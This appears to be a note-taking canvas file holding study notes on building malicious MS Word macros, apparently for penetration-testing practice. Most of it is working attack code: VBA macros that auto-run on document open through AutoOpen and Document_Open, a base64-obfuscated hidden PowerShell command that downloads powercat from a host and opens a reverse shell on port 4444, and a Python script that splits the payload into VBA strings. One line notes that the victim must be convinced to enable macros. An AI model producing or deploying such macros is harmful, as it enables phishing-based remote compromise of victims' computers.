{
	"nodes":[
		{"id":"61e4ba7b2016c0ee","type":"text","text":"# MS WORD  macro","x":-258,"y":-177,"width":338,"height":57},
		{"id":"91fc511553f9f10c","type":"text","text":"must convince the victim to enable them","x":160,"y":-60,"width":250,"height":60},
		{"id":"0adff7a4b8b73465","type":"text","text":"1. Create and save new word file as X.doc (not .docx) (allow for embedding macro to file)\n2. Create macro: View > Macros\n\t1. Set name\n\t2. Macros in (dropdown list) set to X.doc (document)\n\t3. Create button to create macro\n\t4. ","x":-414,"y":203,"width":674,"height":497},
		{"id":"6b9dafa481042d8b","type":"text","text":"Leverage `ActiveX` object which provide access to underlying operating system command","x":430,"y":427,"width":290,"height":133},
		{"id":"366d8e36422557dc","type":"text","text":"# Macro examples\n## start a `PowerShell` window\n```vba\n' Office macros are not executed automatically\n' use the predefined _AutoOpen_ macro and _Document_Open_ event\n' to call our custom procedure\n\nSub AutoOpen()\n  MyMacro\nEnd Sub\n\nSub Document_Open()\n  MyMacro\nEnd Sub\n\nSub MyMacro()\n  CreateObject(\"Wscript.Shell\").Run \"powershell\"\nEnd Sub\n```\n\n## Reverse shell using `powercat`\n```vba\nSub AutoOpen()\n    MyMacro\nEnd Sub\n\nSub Document_Open()\n    MyMacro\nEnd Sub\n\nSub MyMacro()\n    Dim Str As String\n\n' download powercat and run reverse shell command with powershell\n\tStr = Str + \"powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY\"\n\tStr = Str + \"3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5\"\n\tStr = Str + \"nKCdodHRwOi8vMTkyLjE2OC4xMTkuMi9wb3dlcmNhdC5wczEnK\"\n\tStr = Str + \"Ttwb3dlcmNhdCAtYyAxOTIuMTY4LjExOS4yIC1wIDQ0NDQgLWU\"\n\tStr = Str + \"gcG93ZXJzaGVsbAo=\"\n\n    CreateObject(\"Wscript.Shell\").Run Str\nEnd Sub\n```","x":-1520,"y":456,"width":864,"height":1144},
		{"id":"13271dcdee627bdf","type":"text","text":"# Encode command with `base64`\n```bash\n$ cat command file          \nIEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.244/powercat.ps1');powercat -c 192.168.45.244 -p 4444 -e powershell\n\n$ cat aaa | base64\nSUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRw\nOi8vMTkyLjE2OC40NS4yNDQvcG93ZXJjYXQucHMxJyk7cG93ZXJjYXQgLWMgMTkyLjE2OC40NS4y\nNDQgLXAgNDQ0NCAtZSBwb3dlcnNoZWxs\n```\n# Split encoded command to stings of len 50\n```bash\n$ cat splitter.py                         \nstr = \"powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4yNDQvcG93ZXJjYXQucHMxJyk7cG93ZXJjYXQgLWMgMTkyLjE2OC40NS4yNDQgLXAgNDQ0NCAtZSBwb3dlcnNoZWxs\"\nn = 50\nfor i in range(0, len(str), n):\n        print(\"Str = Str + \" + '\"' + str[i:i+n] + '\"')                                                                                                                                                                       \n$ python splitter.py                  \nStr = Str + \"powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY\"\nStr = Str + \"3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5\"\nStr = Str + \"nKCdodHRwOi8vMTkyLjE2OC40NS4yNDQvcG93ZXJjYXQucHMxJ\"\nStr = Str + \"yk7cG93ZXJjYXQgLWMgMTkyLjE2OC40NS4yNDQgLXAgNDQ0NCA\"\nStr = Str + \"tZSBwb3dlcnNoZWxs\"\n```","x":-2740,"y":1175,"width":1080,"height":685}
	],
	"edges":[
		{"id":"14e56d3e1ed27c26","fromNode":"61e4ba7b2016c0ee","fromSide":"right","toNode":"91fc511553f9f10c","toSide":"top"},
		{"id":"7ca596b451cc8178","fromNode":"61e4ba7b2016c0ee","fromSide":"bottom","toNode":"0adff7a4b8b73465","toSide":"top"},
		{"id":"4342311ff1ce835e","fromNode":"0adff7a4b8b73465","fromSide":"right","toNode":"6b9dafa481042d8b","toSide":"left"},
		{"id":"73f4a8ac7dc6e187","fromNode":"0adff7a4b8b73465","fromSide":"left","toNode":"366d8e36422557dc","toSide":"right"},
		{"id":"54091037051a3acf","fromNode":"366d8e36422557dc","fromSide":"left","toNode":"13271dcdee627bdf","toSide":"top"}
	]
}